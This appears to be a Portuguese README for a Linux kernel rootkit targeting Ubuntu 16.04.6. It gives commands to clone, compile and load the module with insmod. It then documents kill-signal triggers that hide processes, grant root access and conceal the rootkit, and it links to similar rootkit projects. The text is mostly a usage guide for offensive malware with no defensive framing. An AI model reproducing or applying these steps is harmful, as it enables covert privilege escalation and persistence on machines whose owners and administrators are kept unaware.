
Um rootkit para ubuntu-16.04.6 (Linux 4.4). Pode ocultar um processo, dar acesso root e se ocultar
Este é um rootkit que foi testado no ubuntu-16.04.6-desktop-amd64 (Linux 4.4), mas deve ser fácil portá-lo para diferentes versões do kernel.
Link para o vídeo --> https://drive.google.com/file/d/1yDktAg9vIPBH3OPEBYset9OdQb0LMevA/view?usp=sharing
Clone o repositório
git clone https://github.com/Asekon/RootKit
Entre na pasta
cd RootKit
Compile
sudo make
Insira o módulo no kernel como root
sudo insmod RootKit.ko
(Des)Ocultar um processo (exemplo: PID 500)
kill -0 500
Obtenha acesso root (você pode inserir qualquer PID, não precisa ser 0)
kill -1 0
(Des)Ocultar o rootkit (você pode inserir qualquer PID, não precisa ser 0)
kill -2 0
remova o módulo do kernel como root (certifique-se de que ele esteja visível na lista de módulos primeiro)
sudo rmmod RootKit
https://en.wikipedia.org/wiki/Rootkit
http://dandylife.net/blog/archives/304
https://github.com/nurupo/rootkit
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
http://derekmolloy.ie/writing-a-linux-kernel-module-part-1-introduction/
http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html
https://yassine.tioual.com/index.php/2017/01/10/hiding-processes-for-fun-and-profit/